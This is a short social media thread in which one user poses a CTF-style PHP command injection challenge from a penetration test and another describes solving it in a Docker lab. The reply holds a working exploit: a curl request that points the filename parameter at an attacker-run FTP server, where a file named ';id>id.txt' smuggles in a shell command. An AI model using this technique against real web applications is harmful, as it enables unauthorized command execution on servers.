OJDec 20, 2022

Had this on a recent engagement and thought I'd provide a cut-down version as a fun little CTF-like challenge.

As an attacker, you can invoke `pwnme()` and control the value of `$filename` via a web request.

You cannot control the contents of the file system that this code is running on. You don't have the ability to upload files.

How do you achieve command injection?

#php #challenge

Show threadkevinfarrow
@oj Okay, I finally got it! I had trouble with Docker's networking, but it now definitely works. I ran @justinsteven's Docker image for the challenge. Then in another Docker image (172.17.0.4), I ran a vsftpd server with a file called ';id>id.txt'. Now I can run `curl 'http://localhost:8000/index.php?filename=ftp://172.17.0.4/;id%3Eid.txt'` which outputs the results of the id command into http://localhost:8000/id.txt.
Dec 24, 2022 at 5:54pmWeb
Show threadOJDec 24, 2022
@kevinfarrow Well done :) Cute little challenge I reckon!
Show threadkevinfarrowDec 24, 2022
@oj definitely!